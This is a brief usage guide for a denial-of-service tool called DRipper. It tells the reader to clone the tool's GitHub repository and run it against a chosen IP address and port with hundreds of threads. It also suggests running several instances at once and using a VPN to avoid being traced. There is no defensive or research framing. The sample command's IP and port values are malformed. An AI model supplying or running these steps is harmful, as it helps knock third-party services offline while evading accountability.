To use the DRipper - install python and download DRipper.py and headers.txt. Do not forget to use VPN!
git clone https://github.com/Umbriferous/DDoS-Ripper
cd DDoS-Ripper
Run with the following command:
python3 DRipper.py -s [ip Address] -p [port] -t [threads]
example: python3 DRipper.py -s 0.00.00.00 -p -80 -t 300
The advised number of threads is between 100 and 400.
You can run multiple instances of DRipper at the same time.